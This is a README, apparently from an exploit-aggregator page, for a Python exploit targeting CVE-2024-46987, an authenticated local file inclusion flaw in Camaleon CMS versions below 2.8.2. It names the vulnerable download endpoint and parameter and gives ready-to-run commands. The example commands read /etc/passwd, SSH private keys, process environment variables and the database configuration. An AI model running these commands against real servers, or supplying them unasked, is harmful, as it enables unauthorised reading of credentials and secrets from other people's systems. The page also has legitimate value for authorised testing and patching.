Share
## https://sploitus.com/exploit?id=300B85BE-7B44-50B4-AC2A-336B8AFD2D88
# CVE-2024-46987 - Camaleon CMS Local File Inclusion

Authenticated Local File Inclusion (LFI) exploit for Camaleon CMS.

## Vulnerability

Camaleon CMS is vulnerable to an authenticated LFI attack through the `/admin/media/download_private_file` endpoint. The `file` parameter is not properly sanitized, allowing path traversal to read arbitrary files from the server.

## Affected Versions

- Camaleon CMS < 2.8.2

## Requirements

```bash
pip install requests
```

## Usage

```bash
# Print file to terminal (default)
python3 exploit.py -u http://target.com -f /etc/passwd -t "auth_token"

# Save to file
python3 exploit.py -u http://target.com -f /etc/passwd -t "auth_token" -o passwd.txt
```

### Parameters

| Parameter | Description |
|-----------|-------------|
| `-u, --url` | Target URL |
| `-f, --file` | File to read (e.g., `/etc/passwd`) |
| `-t, --token` | `auth_token` cookie value |
| `-o, --output` | Output filename (optional, prints to terminal if not set) |

## Examples

```bash
# Read passwd file
python3 exploit.py -u https://example.com -f /etc/passwd -t "access_token"

# Read SSH keys
python3 exploit.py -u https://example.com -f /home/user/.ssh/id_rsa -t "access_token" -o id_rsa

# Read environment variables
python3 exploit.py -u https://example.com -f /proc/self/environ -t "access_token"

# Read application config
python3 exploit.py -u https://example.com -f /var/www/html/config/database.yml -t "access_token"
```

## Disclaimer

This tool is intended for authorized security testing and educational purposes only. Only use against systems you have explicit permission to test.

## References

- [CVE-2024-46987](https://nvd.nist.gov/vuln/detail/CVE-2024-46987)
- [Camaleon CMS](https://github.com/owen2345/camaleon-cms)